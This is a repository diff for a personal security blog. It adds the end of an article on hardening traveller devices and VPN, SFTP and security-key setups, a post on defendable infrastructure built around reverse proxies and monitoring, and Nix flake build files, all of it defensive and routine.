location. Thus, please consider the technologies mentioned as an
example - the power of the model comes into play when you start
switching things up.

### Server Side Components

Consider the availability of external services in all parts of the
process. Ideally a travel device should store information only
outside the regional location of a traveller. Balance storage
with requirements of availability. An example of this is that an
enforced VPN connection may not always be available, which would
practically leave an SFTP link exposed or down.

For the example technologies used in the model shown in the
previous section, the following sections show their use.
#### Cloud Policy, Provisioning, Device and User Management

The reason we really need to use a device management service is
the scalability of deployment. Using a standalone approach may
work and provide some additional security due to the independence
of each device, but management is inevitable in the long run if
you handle even a low number of travels.

In this case, especially due to using ChromeOS, G Suite is the
most straightforward choice. It is important to focus the solution
on managing devices when speaking of travels, not pushing
sensitive configuration files and so on. In the event of a
compromise of the G Suite administrative account, it is possible
to push threat actor-controlled applications and configurations to
devices. Due to this it is essential to clean out the management
domain, or create a new, untraceable one, once in a while.

G Suite is a granular solution. Examples of recommended policies
are: enforced use of security tokens and the disabling of other
two-factor authentication options, screen lock upon lid close and
so on.

When testing G Suite and ChromeOS I figured that it is easiest to
provision VPN configuration files (``.onc``) and certificates
manually. For iOS the same goes for ``.mobileconfig``. Doing this
adds another protective layer.
#### VPN

For VPN, my experience is that the most reliable option is using
the natively supported VPN clients in the operating system used
for travel. In this case that is ChromeOS with OpenVPN and iOS with
IPSec. This adds a bit to the complexity, as iOS does not support
OpenVPN, which runs most reliably in some countries that censor
the Internet. However, ChromeOS does. The solution to this is
using two VPS nodes for tunneling traffic:

1. OpenVPN service through ansible-openvpn-hardened [4]
2. IPSec service through [5]. Lenny Zeltser created a
   deployment guide on algo recently [6]

Again: to reduce exposure through centrality, you should not
provision device-specific keys from central management
consoles. Also, make sure to use certificates for any service that
needs to connect to the Internet.

**OpenVPN**:

Configure according to the README on the
``ansible-openvpn-hardened`` Github page. When you deploy the
OpenVPN server, you will be left with a file named something like
``<user-id>@<random-word>.preregistration-pki-embedded.ovpn`` in
the ``fetched_credentials/<domain>`` directory. Just like Apple
has its ``mobileconfig`` format, the Chromium Project uses the
Open Network Configuration (ONC) [7]. In order to convert this
format to a working configuration file, use ovpn2onc.py [9] like
the following.

    python3 reference/convert.py --infile *-pki-embedded.ovpn --outfile vpn_configuration.onc --name my_vpn

This results in a configuration file named
``vpn_configuration.onc``. ChromeOS will not give you any feedback
here, so make sure to read through everything to get it right the
first time. If you end up troubleshooting, I found that the
Chromium project does have some working examples [9]. Import
``vpn_configuration.onc`` in Chrome as shown in the next section.

Due to the hardened setup, be particularly strict about configuring
an OS version according to the repo README. For instance,
Debian 8.10 won't work.

**Algo**: Has great docs as-is.
#### SFTP

An SFTP service is simple to deploy manually. However, when
scalability and hardening matter, it is best to automate the
deployment. Through testing available Ansible scripts I ended up
with Johan Meiring's ansible-sftp [10]. Again, the configuration
is self-explanatory. You should however note that public
keys should be put in a ``files/`` directory under the
``ansible-sftp`` root. These can be generated with
``ssh-keygen``; the private keys need to be stored somewhere else
for manual transfer to the laptop accessing the share.

Since this is a traveller setup you should seek to create a
disconnect from cloud drives and rather use local storage and
SFTP. Disable OneDrive in Office 365 Business and Google Drive in
G Suite.
#### Deploying an Out-of-Band (OOB) Channel

Communications is king and perhaps one of the most important
things you configure.

I described using Matrix and Riot for OOB recently [11].

#### Security Keys

Nowadays, strong authentication is so easy that everyone should
use it. In a hostile environment it is hygiene. Google uses
Yubikeys and Feitian tokens in their authentication services, and
so should a traveller [12,13,14]. This eliminates some of the
uncertainty when authenticating against remote servers and is
something the traveller can keep on-body at all times. For this
setup not every service can maintain usability when using
tokens. Those services - such as a mounted SFTP share - should use
certificates.
### Client Side Components
|
||||||
|
|
||||||
|
So why a Chromebook?
|
||||||
|
|
||||||
|
* Has a minimal configuration. Everything you do is in the
|
||||||
|
browser
|
||||||
|
* You get granular control through G Suite
|
||||||
|
* Based on the Linux-kernel, which means it is different from
|
||||||
|
Windows and may require some extra effort from a threat actor
|
||||||
|
* A lot of work has gone in to the user interface in ChromeOS, so
|
||||||
|
it will feel familiar and intuitive to users
|
||||||
|
* ChromeOS has a lot of security features built-in [15], such as:
|
||||||
|
Secure Boot, Security Key login and so on.
|
||||||
|
|
||||||
|
G Suite will help you a little bit on the way when it comes to
|
||||||
|
configuration control. However, it requires some client-side
|
||||||
|
configuration.
|
||||||
|
|
||||||
|
The client side consists of components. I chose to model these as
|
||||||
|
five layers:

The Traveller. The most important asset on a travel is most likely
the human traveller. This asset will have some values assigned to
it, such as security keys, credentials and the traveller's own
knowledge. Anonymise information stored here. In other words, make
sure to use an identifier and not the traveller's real name.

Device and information. When selecting devices and putting
information on them you have entered the device and information
exposure layer. This will typically consist of all hardware
peripherals, such as cameras, and content such as calls made from
a handset. Other things to consider here for ChromeOS are
deploying PGP and its keys with Mailvelope, and Office from the
Google Play Store.

Content. It was actually kind of interesting to model this from an
iOS and ChromeOS perspective, because ChromeOS keeps most of its
applications in the browser while iOS has native apps in line with
Chrome. This means that the exposure surface of ChromeOS is more
uniform than that of iOS.

Native applications. These are the applications installed in the
operating system directly. iOS has a larger exposure here, with
native applications for e.g. communications, while on ChromeOS you
will basically only install an SFTP plugin for the file system and
otherwise use Chrome for the travel.

Transport. When travelling to a hostile environment, tunnel all
communications to and from the system as far as possible. Both iOS
and ChromeOS have sufficient mechanisms here, as we reviewed in
the previous section. For encryption keys:

1. Transfer the encryption keys stored in the ``.p12`` file and
   the configuration to the Chromebook
2. Install the encryption keys in
   ``chrome://settings/certificates``. Use the "Import and Bind"
   option to bind the certificate to the TPM
3. Import the VPN configuration (ONC) in
   ``chrome://net-internals/#chromeos``

That is basically it.


## Conclusion


The art of balancing threat resiliency, usability and cost is an
intriguing problem.

The technology presented in this article is in no way designed to
survive in hostile environments when considering the capabilities
of nation state threat actors. Fundamental security mechanisms are
lacking in this regard, and only companies like Microsoft, Google
and Apple can provide the basis to change that. We can, however,
slow these actors down considerably.

An important aspect to consider, in order to compensate for the
above weaknesses, is that organisations need to handle these
problems on an operational and strategic level as well.

Using cloud environments is a solid choice for travel. However,
against threat actors that are able to gain access to the hosts of
those environments they are not sufficient. To solve this, the
most valuable services may be moved in-house or to a hardened
cloud environment. End-to-end encryption is also required when
using cloud services, such as the included inbox of G Suite.

Please keep in mind that the Tactical Traveler Protection Model is
a core model. This article does not cover every aspect; examples
of what is left out are encryption and protection of external
peripherals and memory devices, as well as operational and
strategic considerations.

Organisations have yet to prove a working model resilient to
capable adversaries. Hopefully this article will be a foundation
for discussing variations and weaknesses in the community.

[1] https://motherboard.vice.com/en_us/article/a3q374/hacker-bios-firmware-backdoor-evil-maid-attack-laptop-5-minutes
[2] https://mitre.github.io/attack-navigator/enterprise/
[3] https://attack.mitre.org/wiki/Initial_Access
[4] https://github.com/bau-sec/ansible-openvpn-hardened
[5] https://github.com/trailofbits/algo
[6] https://zeltser.com/deploy-algo-vpn-digital-ocean/
[7] https://www.chromium.org/chromium-os/chromiumos-design-docs/open-network-configuration
[8] https://gist.github.com/tommyskg/6d0eeecc5bab65a49d72f5b16e086976
[9] https://chromium.googlesource.com/chromium/src/+/32352ad08ee673a4d43e8593ce988b224f6482d3/chromeos/test/data/network
[10] https://github.com/johanmeiring/ansible-sftp
[11] https://secdiary.com/2018-07-11-matrix.html
[12] https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
[13] https://www.yubico.com/product/yubikey-4-series/#yubikey-4c
[14] https://ftsafe.com/onlinestore/product?id=3
[15] http://dhanus.mit.edu/docs/ChromeOSSecurity.pdf

222
data/vantage.md
Normal file

@@ -0,0 +1,222 @@

## Key Takeaways

* Monitoring the technology infrastructure is a key element of
  situational awareness in both security and IT operations.
* A 2020 infrastructure should use a modern application layer
  reverse proxy such as Pomerium in front of all services. Leave
  all clients outside.
* The threat landscape should be the focus when shaping a
  defendable infrastructure.

<small><i>Disclaimer: If you have outsourced all your equipment
and information to "the cloud", this post is a sanity check of the
relationship with your vendor. The primary audience of this post
is everyone willing to invest in people and knowledge to provide
the best possible defense for their people and processes, and the
technology supporting them.</i></small>

## Introduction


I cannot begin to imagine how many times Sun Tzu must have been
quoted in board rooms around the world:

> If you know the enemy and know yourself, you need not fear the
> result of a hundred battles. If you know yourself but not the
> enemy, for every victory gained you will also suffer a
> defeat. If you know neither the enemy nor yourself, you will
> succumb in every battle.

However much repeated, the message has not come across. Why is
that? Because this is a hard problem to solve. It lies at the
intersection between people, culture and technology.

If everyone used reverse proxies in a sensible way I would
probably have a lot less to do at work. Time and time again it
turns out that organisations do not have configuration control
over their applications and infrastructure, and the reverse proxy
is a central building block in gaining it. To a large extent
everything is about logs and traceability when an incident occurs.

## Beyondcorp and The Defendable Infrastructure


The lucky part of this hard-to-solve problem is that Google has
already prescribed one good solution in its Beyondcorp whitepapers
[1].

Much of this was, however, described earlier by the Norwegian
Armed Forces in its five architecture principles for a defendable
infrastructure, published by the former Head of Section at the
Critical Infrastructure Protection Centre [2]:

1. Monitor the network for situational awareness
2. A defender must be able to shape the battleground to have
   freedom of movement and to limit the opponent's freedom of
   movement
3. Update services to limit vulnerability exposure
4. Minimize the infrastructure to limit the attack surface
5. Traceability is important to analyze what happened

I know that Richard Bejtlich was an inspiration for the defendable
infrastructure principles, so the books written by him are
relevant [4,5].

Defendable infrastructure is a good term, also used in a 2019
Lockheed Martin article which defines it well [3]:

> Classical security engineering and architecture has been trying
> to solve the wrong problem. It is not sufficient to try to build
> hardened systems; instead we must build systems that are
> defendable. A system’s requirements, design, or test results can’t
> be declared as "secure." Rather, it is a combination of how the
> system is designed, built, operated, and defended that ultimately
> protects the system and its assets over time. Because adversaries
> adapt their own techniques based on changing objectives and
> opportunities, systems and enterprises must be actively defended.

The development of these architecture principles happened before
2010, so the question remains how they apply in 2020. We may get
back to the other principles in later posts, but the rest of this
article will focus on monitoring in a 2020 perspective.

## Monitoring - a Central Vantage Point


One thing that has developed since 2010 is our understanding of
where to position monitoring capabilities, together with the more
mainstream possibility of detection on endpoints. The historical
focus of mature teams was primarily on the network layer. While
the network layer is still important as an objective point of
observation, the application layer has received more attention.
The reason is the acceptance that this is often where exploitation
happens, and that capable commercial products have emerged.

With that in mind, a shift in the understanding of best practice
for positioning reverse proxies has occurred as well. While the
previous recommendation was to defend inside-out, the focus is now
to defend outside-in.

Defending outside-in means taking control of what can be
controlled: the application infrastructure. In all practicality
this means positioning the reverse proxy in front of your server
segment instead of the whole network, including clients.

                                                         [ Application A ]
    [ Client on-prem ]                                           |
                       ] ---> [ Reverse proxy ] ---> [ App gateway ]
    [ Client abroad ]                 ^                          |
                               risk assessment          [ Application B ]

Previously, for some reason, we put the "client on-prem" on the
other side of the reverse proxy, because we believed we could
control what the user was doing. Today, we know better. This is
not a trust issue; it is a matter of prioritizing based on the
asset value and the defending capacity.

A reverse proxy is also a central vantage point of your
infrastructure. In a nutshell, if you are good at detecting
security incidents at this point, you are in a good position to
have freedom of movement - such as channeling your opponent.

The modern reverse proxy has two integration capabilities that
legacy proxies do not:

* Single sign-on (SSO), which provides strong authentication and
  good identity management
* Access control logic (Google calls this the access control
  engine)

In fact, Google stated in 2013 that it uses more than 120
variables for the risk assessment in its access control logic for
Gmail [6]. In comparison, most organisations today use three:
username, password and, in half the instances, a token.

> Every time you sign in to Google, whether via your web browser
> once a month or an email program that checks for new mail every
> five minutes, our system performs a complex risk analysis to
> determine how likely it is that the sign-in really comes from
> you. In fact, there are more than 120 variables that can factor
> into how a decision is made.

I imagine that Google uses factors like the following in addition
to the sole username/password approach (they state some of these
in their article); a toy scoring sketch follows the list:

- Geo-location, with an algorithmic score of the distance between
  the location of the last login and the current one. The k-means
  distance could be a good fit.
- Source ASN risk score
- Asset subject to access
- User role scored against the asset subject to access
- Device state (updated, antivirus installed and so on)
- Previous usage patterns, like time of day
- Other information about the behavioural patterns of relevant
  threats
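
The sketch below is only my toy illustration of how a handful of
such factors could be folded into a single score at the reverse
proxy. The factor names, weights and the great-circle distance
calculation are my own assumptions; this is neither Google's
algorithm nor Pomerium's API.

    import math

    def geo_distance_km(lat1, lon1, lat2, lon2):
        """Great-circle distance between the previous and current login."""
        phi1, phi2 = math.radians(lat1), math.radians(lat2)
        dphi = math.radians(lat2 - lat1)
        dlmb = math.radians(lon2 - lon1)
        a = (math.sin(dphi / 2) ** 2
             + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2)
        return 6371 * 2 * math.asin(math.sqrt(a))

    def login_risk(prev_geo, cur_geo, asn_risk, asset_value,
                   role_matches_asset, device_updated, usual_hour):
        """Toy risk score in [0, 1]; weights are arbitrary for illustration."""
        distance = geo_distance_km(*prev_geo, *cur_geo)
        score = 0.0
        score += 0.30 * min(distance / 5000, 1.0)   # improbable travel
        score += 0.20 * asn_risk                    # reputation of source ASN
        score += 0.20 * asset_value                 # sensitivity of the asset
        score += 0.10 * (0.0 if role_matches_asset else 1.0)
        score += 0.10 * (0.0 if device_updated else 1.0)
        score += 0.10 * (0.0 if usual_hour else 1.0)
        return score

    # Example: a login from far away, from a risky ASN, outside normal hours.
    risk = login_risk((59.9, 10.7), (1.35, 103.8), asn_risk=0.8,
                      asset_value=0.9, role_matches_asset=True,
                      device_updated=False, usual_hour=False)
    print(f"risk score: {risk:.2f}")

In the spirit of the next paragraph, a score above some threshold
could trigger a challenge rather than a plain deny.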

Another nice feature of a reverse proxy set up this way is that it
minimizes the exposure and gives defenders the possibility to
route traffic the way they see fit. For instance, it would be hard
for an attacker to differentiate between a honeypot and a
production system in the first place. One could also challenge the
user in cases of doubt, instead of plainly denying access as is
sometimes done.

One challenge is deciding which protocols need support. The clear
ones are:

* HTTP
* SSH
* Application gateways between micro-segments

I have scoped the details of micro-segmentation out of this
post. Micro-segmentation is the basic idea of creating a fine mesh
of network segments in the infrastructure so that no asset can
communicate with another by default. The rest is then routed
through e.g. a gateway such as Pomerium, or in high-performance
cases an application gateway - which may be a gateway for a
specific binary protocol. The goal is control of all activity
between services: being able to shape and deny access in the
terrain. A small sketch of the default-deny idea follows.
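
As a minimal sketch, assume each segment gateway holds an explicit
allowlist of service-to-service flows and drops and logs
everything else. The service names and the policy format below are
made up for illustration and do not correspond to Pomerium's
configuration.

    # Hypothetical allowlist: (source service, destination service, port).
    ALLOWED_FLOWS = {
        ("web-frontend", "app001.example.com", 8443),
        ("app001.example.com", "db001.example.com", 5432),
    }

    def gateway_decision(src, dst, port):
        """Default deny: only explicitly allowed flows pass the gateway."""
        allowed = (src, dst, port) in ALLOWED_FLOWS
        # Every decision is logged; denials are what the defender wants to see.
        print(f"{'ALLOW' if allowed else 'DENY'} {src} -> {dst}:{port}")
        return allowed

    gateway_decision("web-frontend", "app001.example.com", 8443)   # ALLOW
    gateway_decision("web-frontend", "db001.example.com", 5432)    # DENY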

Even though this post is not about implementation, I will leave
you with some examples of good open source starting points:
Pomerium is a reverse proxy with SSO capability, and the default
capabilities of SSH take you far (ssh-ca and JumpHost), as
sketched after Figure 1.

               ----------->  [ syslog server ]  <------------
               |                    |                        |
               |                    |                        |
      o        |                    |                        |
     /|\   [ Client ] -------> [ example.com ] <-----> [ app001.example.com ]
     / \       |                https - pomerium             |
               |                     - SSH JumpHost          |
               |                    |                        |
               |                    |                        |
           [ HIDS ]                 |-------------------> [ NIDS ]

    Figure 1: Conceptual Defendable Infrastructure Overview
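
To make the SSH part of Figure 1 concrete, the sketch below shows
the two building blocks mentioned above: reaching an internal host
through a JumpHost, and signing a user key with an SSH CA instead
of spreading authorized_keys. The host names, user names, CA path
and validity period are placeholders for illustration only.

    import subprocess

    # Hypothetical host names matching Figure 1; adjust to your environment.
    JUMP = "traveller@example.com"            # the SSH JumpHost at the edge
    TARGET = "traveller@app001.example.com"   # service host inside the segment

    # 1) Reach an internal host through the JumpHost with OpenSSH's -J option.
    subprocess.run(["ssh", "-J", JUMP, TARGET, "hostname"], check=True)

    # 2) With an SSH CA, sign a user key instead of distributing authorized_keys.
    subprocess.run([
        "ssh-keygen", "-s", "ssh_user_ca",   # CA private key (placeholder path)
        "-I", "traveller01",                 # certificate identity
        "-n", "traveller",                   # allowed principal (login name)
        "-V", "+1d",                         # short validity for the travel
        "id_ed25519.pub",                    # user public key to sign
    ], check=True)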

Now that a checkpoint is established in front of the
infrastructure, the rest is a matter of traceability: taking the
time to understand the data, gaining insight, and finally
developing and implementing tactics against your opponents.


Until next time.

[1] https://cloud.google.com/beyondcorp
[2] https://norcydef.blogspot.com/2013/03/tg13-forsvarbar-informasjonsinfrastrukt.html
[3] https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Defendable-Architectures.pdf
[4] The Tao of Network Security Monitoring: Beyond Intrusion Detection
[5] Extrusion Detection: Security Monitoring for Internal Intrusions
[6] https://blog.google/topics/safety-security/an-update-on-our-war-against-account/

77
flake.lock
Normal file

@@ -0,0 +1,77 @@

{
  "nodes": {
    "cl-nix-lite": {
      "locked": {
        "lastModified": 1721009305,
        "narHash": "sha256-GtVd8VmPZB+J64VCf26yLbFUFRT1mdpzC8ylAHMIJoo=",
        "owner": "hraban",
        "repo": "cl-nix-lite",
        "rev": "dc2793ec716b294739dabd6d99cc61543e6cd149",
        "type": "github"
      },
      "original": {
        "owner": "hraban",
        "repo": "cl-nix-lite",
        "type": "github"
      }
    },
    "flake-utils": {
      "inputs": {
        "systems": "systems"
      },
      "locked": {
        "lastModified": 1710146030,
        "narHash": "sha256-SZ5L6eA7HJ/nmkzGG7/ISclqe6oZdOZTNoesiInkXPQ=",
        "owner": "numtide",
        "repo": "flake-utils",
        "rev": "b1d9ab70662946ef0850d488da1c9019f3a9752a",
        "type": "github"
      },
      "original": {
        "owner": "numtide",
        "repo": "flake-utils",
        "type": "github"
      }
    },
    "nixpkgs": {
      "locked": {
        "lastModified": 1722791413,
        "narHash": "sha256-rCTrlCWvHzMCNcKxPE3Z/mMK2gDZ+BvvpEVyRM4tKmU=",
        "owner": "NixOS",
        "repo": "nixpkgs",
        "rev": "8b5b6723aca5a51edf075936439d9cd3947b7b2c",
        "type": "github"
      },
      "original": {
        "owner": "NixOS",
        "ref": "nixos-24.05",
        "repo": "nixpkgs",
        "type": "github"
      }
    },
    "root": {
      "inputs": {
        "cl-nix-lite": "cl-nix-lite",
        "flake-utils": "flake-utils",
        "nixpkgs": "nixpkgs"
      }
    },
    "systems": {
      "locked": {
        "lastModified": 1681028828,
        "narHash": "sha256-Vy1rq5AaRuLzOxct8nz4T6wlgyUR7zLU309k9mBC768=",
        "owner": "nix-systems",
        "repo": "default",
        "rev": "da67096a3b9bf56a91d16901293e51ba5b49a27e",
        "type": "github"
      },
      "original": {
        "owner": "nix-systems",
        "repo": "default",
        "type": "github"
      }
    }
  },
  "root": "root",
  "version": 7
}

58
flake.nix

@@ -13,17 +13,57 @@
     pkgs = nixpkgs.legacyPackages.${system}.extend cl-nix-lite.overlays.default;
   in
   {
-    defaultPackage.x86_64-linux =
-      # Notice the reference to nixpkgs here.
-      with import nixpkgs { system = "x86_64-linux"; };
-      stdenv.mkDerivation {
-        name = "hello";
-        src = self;
-        buildPhase = "gcc -o hello ./hello.c";
-        installPhase = "mkdir -p $out/bin; install -t $out/bin hello";
-      };
+    packages = {
+      ecl = with pkgs.lispPackagesLiteFor pkgs.ecl; lispDerivation {
+        name = "thoughts";
+        lispSystem = "thoughts";
+        lispDependencies = [
+          asdf
+          arrow-macros
+        ];
+        src = pkgs.lib.cleanSource ./generator.lisp;
+        meta = {
+          license = pkgs.lib.licenses.agpl3Only;
+        };
+
+        buildInputs = [
+          pkgs.ecl
+          pkgs.git
+          pkgs.gnumake
+          pkgs.asdf
+          pkgs.multimarkdown
+        ];
+
+        phases = [ "unpackPhase" "installPhase" "cleanupPhase" ];
+
+        unpackPhase = ''
+          mkdir -p $TMPDIR
+          cp ${./generator.lisp} $TMPDIR/generator.lisp
+          mkdir -p $TMPDIR/data
+          cp -r ${toString ./data}/* $TMPDIR/data/
+          mkdir -p $TMPDIR/templates
+          cp -r ${toString ./templates}/* $TMPDIR/templates/
+          mkdir -p $TMPDIR/static
+          cp -r ${toString ./static}/* $TMPDIR/static/
+        '';
+
+        installPhase = ''
+          mkdir -p $out/html
+          mkdir -p $out/gemini
+          mkdir -p $TMPDIR/output/gemini/articles
+          mkdir -p $TMPDIR/output/html
+          mkdir -p $TMPDIR/temp/data
+          cd $TMPDIR
+          ecl --load $TMPDIR/generator.lisp
+          cp -r $TMPDIR/output/html/* $out/html/
+          cp -r $TMPDIR/output/gemini/* $out/gemini/
+          cp -r $TMPDIR $out/tmpdir
+        '';
+
+        cleanupPhase = ''
+          rm -rf $TMPDIR/temp
+        '';
+      };
+    };

     devShell = pkgs.mkShell {